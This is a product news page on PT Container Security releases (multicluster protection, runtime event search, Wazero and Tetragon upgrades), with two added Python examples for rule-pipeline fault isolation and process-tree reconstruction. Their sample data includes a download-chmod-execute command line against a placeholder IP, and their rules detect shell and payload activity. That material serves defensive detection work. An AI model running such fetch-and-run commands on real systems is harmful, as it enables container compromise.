
PT Container Security

Product
Developers: Positive Technologies
Last Release Date: 2025/06/10
Branches: Information security
Technology: Information Security Management (SIEM)

Main article: Security Information and Event Management (SIEM)

2025: PT Container Security 0.7 with separate runtime event page

On June 10, 2025, Positive Technologies released PT Container Security 0.7, an updated version of its product for protecting container environments. The main feature of the release is multiclustering: protection of every cluster in the infrastructure from a single management point.

PT Container Security now allows all of its security agents (runtime monitoring, image scanning, the admission controller and configuration scanning) to be deployed to protected clusters throughout the customer's infrastructure. This centralizes container security control, shortens response time to container security incidents, and makes investigation and post-incident analysis by SOC and IT monitoring teams considerably easier.

PT Container Security's multicluster architecture allows SOC engineers and analysts to:

  • connect only the necessary security sensors in each child cluster, saving computing resources;
  • use external message queues, configuration DBMSs and event storage, reducing resource consumption and network infrastructure costs for collecting and processing large event streams;
  • use a common authentication mechanism for all clusters to control access to the sensitive information processed in the system.

"Our approach to organizing the processing of data from sensors, together with the microservice architecture, allows us to build an optimal security infrastructure for multicluster containerization environments, in which the user gets the best ratio of consumed resources to the volume of the processed security event flow," said Mikhail Bessarab, Product Manager of PT Container Security.

Version 0.7 also brings PT Container Security a number of new functions.

  1. Investigating runtime incidents has been made easier for SOC analysts: a separate runtime event page has been added that displays all information about the parent and sibling processes of the process in question.
  2. Notifications now carry a link to the event registered by the sensors, so that response teams can be alerted promptly.
  3. The anomaly detection engine has been optimized, improving the processing of large event streams: if one rule fails with an error, the threat detection pipeline does not stop but continues evaluating all other rules.
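
The fault isolation described in item 3 is worth seeing in code. The following is an added example, not PT Container Security's own code: a small rule pipeline that evaluates every detector on every event, counts a failing rule's errors instead of letting the exception abort the stream, and (an assumption added here, not a documented product behavior) quarantines a rule after a configurable number of failures. The event lines imitate Tetragon's `process_exec` JSON and are constructed sample data; the rule names are hypothetical.

```python
import json
from collections import Counter

# Constructed Tetragon-style process_exec lines (sample data, not real telemetry).
# Line 3 lacks "arguments", which trips a rule that indexes the field directly;
# line 5 is not valid JSON at all.
POD = {"namespace": "prod", "name": "web-7d9f"}
SAMPLE_LINES = [
    json.dumps({"process_exec": {"process": {"binary": "/bin/sh", "arguments": "-c id", "pod": POD}}}),
    json.dumps({"process_exec": {"process": {"binary": "/usr/bin/curl",
                                             "arguments": "-sO http://198.51.100.7/x", "pod": POD}}}),
    json.dumps({"process_exec": {"process": {"binary": "/tmp/x", "pod": POD}}}),
    json.dumps({"process_exec": {"process": {"binary": "/bin/chmod", "arguments": "+x /tmp/x", "pod": POD}}}),
    "{not json",
]


# Each rule receives the "process" object and returns True when it should alert.
# The rule names are hypothetical, chosen for this example.
def shell_in_container(proc):
    return proc["binary"] in ("/bin/sh", "/bin/bash", "/bin/dash")


def exec_from_tmp(proc):
    return proc["binary"].startswith(("/tmp/", "/dev/shm/"))


def curl_download(proc):
    # Deliberately fragile: assumes "arguments" is always present, so a record
    # without it raises KeyError. A robust rule would use proc.get("arguments", "").
    return "http" in proc["arguments"] and proc["binary"].endswith("curl")


RULES = {
    "shell_in_container": shell_in_container,
    "exec_from_tmp": exec_from_tmp,
    "curl_download": curl_download,
}
MAX_RULE_ERRORS = 3  # assumption: quarantine a rule after this many failures


def run_pipeline(lines, rules=RULES, max_errors=MAX_RULE_ERRORS):
    """Evaluate every rule on every event; a failing rule is counted, not fatal.

    Returns (alerts, errors, disabled): alerts as (line_no, rule, binary) tuples,
    errors as a dict of failure counts per rule (plus "_parse" for bad input),
    and the set of rules quarantined after max_errors failures.
    """
    alerts, errors, disabled = [], Counter(), set()
    for line_no, line in enumerate(lines, 1):
        try:
            proc = json.loads(line)["process_exec"]["process"]
        except (ValueError, KeyError, TypeError):
            errors["_parse"] += 1  # bad input is skipped, the stream goes on
            continue
        for name, rule in rules.items():
            if name in disabled:
                continue
            try:
                if rule(proc):
                    alerts.append((line_no, name, proc["binary"]))
            except Exception:  # isolate this rule's failure from the others
                errors[name] += 1
                if errors[name] >= max_errors:
                    disabled.add(name)
    return alerts, dict(errors), disabled


if __name__ == "__main__":
    found, errs, off = run_pipeline(SAMPLE_LINES)
    for alert in found:
        print("ALERT line %d %-18s %s" % alert)
    print("rule errors:", errs, "quarantined:", sorted(off))
```

On the sample stream the `/tmp/x` record still produces its `exec_from_tmp` alert even though `curl_download` crashes on the same event, and the malformed line is counted rather than fatal. The quarantine threshold is a design choice for production pipelines: a rule that fails on every event would otherwise turn the error log into a second high-volume stream.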

In addition, for the convenience of deployment engineers, the release includes a graphical step-by-step installer that configures the PT Container Security installation script so that additional clusters can be connected in minutes.

2024: Runtime event search and incident investigation

Positive Technologies has released an updated version of PT Container Security, its product for protecting container environments. The main features of the release are the ability to search runtime events and investigate incidents, improved performance from updating the WebAssembly runtime (Wazero), runtime detectors developed on the basis of tests on the Standoff cyber range, and an updated version of Tetragon containing a number of improvements to the runtime monitoring engine. The company announced this on September 30, 2024.

According to field tests, PT Container Security can process a stream of tens of thousands of events per second or more. The product supports large high-load production clusters without loss of speed, which the vendor presents as the ability to secure infrastructure of any size. As load increases, PT Container Security scales horizontally, by adding replicas, or vertically, by adding computing resources. Further performance gains came from the latest versions of the WebAssembly runtime and Tetragon.

WebAssembly lets detection modules be written in general-purpose programming languages and lets detection logic of arbitrary complexity be shipped as portable, cross-platform bytecode. Moving to the latest versions of the Wazero runtime, which has included an optimizing compiler since release 1.7, sped up each individual detector by 30-35% without any change to its source code. Tetragon has been used in PT Container Security (PT CS) for runtime threat detection since the first commercial version of the product.

"PT Container Security is based on the most current technologies. With the help of scaling, our development team guarantees stable operation of the solution under high loads and at the maximum possible speed," said Nikita Ladoshkin, Development Manager of PT Container Security at Positive Technologies.

As part of the update, PT Container Security received new capabilities that make it easier for analysts to investigate runtime incidents:

  • Context filters. Quickly find events related to the activity of child and parent processes, for example when an attacker runs malicious utilities in a compromised container. Built on observation and analysis of real investigations, they help reconstruct the chain of an attacker's actions.
  • Conventional filters. Help focus on important events, such as those related to a particular Kubernetes pod or to specific executable files.
  • Presets for frequent checks, raw event formatting and quick filters help security specialists investigate cyber incidents in containers faster, without losing information, and let them return quickly to any point of the investigation.
  • Detectors developed with the PT Expert Security Center. Thanks to their flexibility, the detectors require no additional tuning; they combine signature and behavioral approaches to runtime threat detection in a hybrid option that draws on the strengths of both methods. The set of detectors is constantly expanded.
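
The context filters above, and the runtime event page in version 0.7 that shows a process's parent and siblings, both come down to reconstructing a process tree from runtime exec events. The following is an added example, not PT Container Security's own code: it builds that tree from Tetragon-like `process_exec` records (the `process.exec_id` / `parent.exec_id` linkage is Tetragon's; the records themselves are constructed sample data), then answers the questions an investigator asks of one event: the ancestry chain, the siblings, the descendants, and a conventional filter by Kubernetes pod.

```python
import json
from collections import defaultdict


def make_event(exec_id, parent_id, binary, arguments, start, ns="prod", pod="web-7d9f"):
    """One constructed process_exec record in Tetragon-like JSON (sample data)."""
    return json.dumps({"process_exec": {
        "process": {"exec_id": exec_id, "binary": binary, "arguments": arguments,
                    "start_time": start, "pod": {"namespace": ns, "name": pod}},
        "parent": {"exec_id": parent_id}}})


# Constructed stream: a web app's shell child downloads, chmods and runs a payload
# while a legitimate worker starts next to it; a second pod adds noise.
SAMPLE_LOG = "\n".join([
    make_event("A", "init", "/usr/bin/python3", "app.py", "2025-06-10T09:00:00Z"),
    make_event("B", "A", "/bin/sh", "-c curl -sO http://198.51.100.7/x && chmod +x /tmp/x && /tmp/x",
               "2025-06-10T09:05:00Z"),
    make_event("F", "A", "/usr/bin/python3", "worker.py", "2025-06-10T09:05:01Z"),
    make_event("C", "B", "/usr/bin/curl", "-sO http://198.51.100.7/x", "2025-06-10T09:05:02Z"),
    make_event("D", "B", "/bin/chmod", "+x /tmp/x", "2025-06-10T09:05:03Z"),
    make_event("E", "B", "/tmp/x", "", "2025-06-10T09:05:04Z"),
    make_event("Z", "init", "/usr/bin/nginx", "-g daemon off;", "2025-06-10T09:00:00Z", pod="proxy-1"),
])


def load_events(log_text):
    """Parse JSON lines, keeping only process_exec records (other kinds are skipped)."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if "process_exec" in rec:
            events.append(rec["process_exec"])
    return events


def build_tree(events):
    """Index processes by exec_id and link parents to children.

    Returns (nodes, children, parent_of); child lists are sorted by start time
    so that siblings read as a timeline.
    """
    nodes, children, parent_of = {}, defaultdict(list), {}
    for e in events:
        proc = e["process"]
        nodes[proc["exec_id"]] = proc
        parent_of[proc["exec_id"]] = e["parent"]["exec_id"]
        children[e["parent"]["exec_id"]].append(proc["exec_id"])
    for ids in children.values():
        ids.sort(key=lambda i: nodes[i]["start_time"])
    return nodes, children, parent_of


def ancestry(tree, exec_id):
    """Binaries from the oldest known ancestor down to exec_id (the attacker's chain)."""
    nodes, _, parent_of = tree
    chain, cur = [], exec_id
    while cur in nodes:  # stops at a parent we never saw exec (e.g. container init)
        chain.append(nodes[cur]["binary"])
        cur = parent_of[cur]
    return list(reversed(chain))


def siblings(tree, exec_id):
    """Other processes started by the same parent, in start order."""
    nodes, children, parent_of = tree
    return [nodes[i]["binary"] for i in children[parent_of[exec_id]] if i != exec_id]


def descendants(tree, exec_id):
    """Everything spawned below exec_id, depth-first, children in start order."""
    nodes, children, _ = tree
    out, stack = [], list(reversed(children[exec_id]))
    while stack:
        cur = stack.pop()
        out.append(nodes[cur]["binary"])
        stack.extend(reversed(children[cur]))
    return out


def context(tree, exec_id):
    """What a runtime event page shows next to one event: parent, siblings, children."""
    nodes, children, parent_of = tree
    parent = nodes.get(parent_of[exec_id])
    return {"process": nodes[exec_id]["binary"],
            "parent": parent["binary"] if parent else None,
            "siblings": siblings(tree, exec_id),
            "children": [nodes[i]["binary"] for i in children[exec_id]]}


def in_pod(events, namespace, pod):
    """Conventional filter: only process_exec events from one Kubernetes pod."""
    selected = []
    for e in events:
        pod_info = e["process"].get("pod") or {}
        if pod_info.get("namespace") == namespace and pod_info.get("name") == pod:
            selected.append(e)
    return selected


if __name__ == "__main__":
    tree = build_tree(load_events(SAMPLE_LOG))
    print(" -> ".join(ancestry(tree, "E")))  # the chain that led to /tmp/x
    print(context(tree, "E"))
```

Starting from the alert on `/tmp/x`, `ancestry` yields `python3 -> sh -> /tmp/x`, and `siblings` shows the `curl` and `chmod` that prepared the payload, which is the chain-of-actions view the context filters are meant to provide. Note that the chain stops at the first ancestor that never produced an exec event; on a real sensor that is typically the container's init process, so trees are reliable only from the point the sensor started observing.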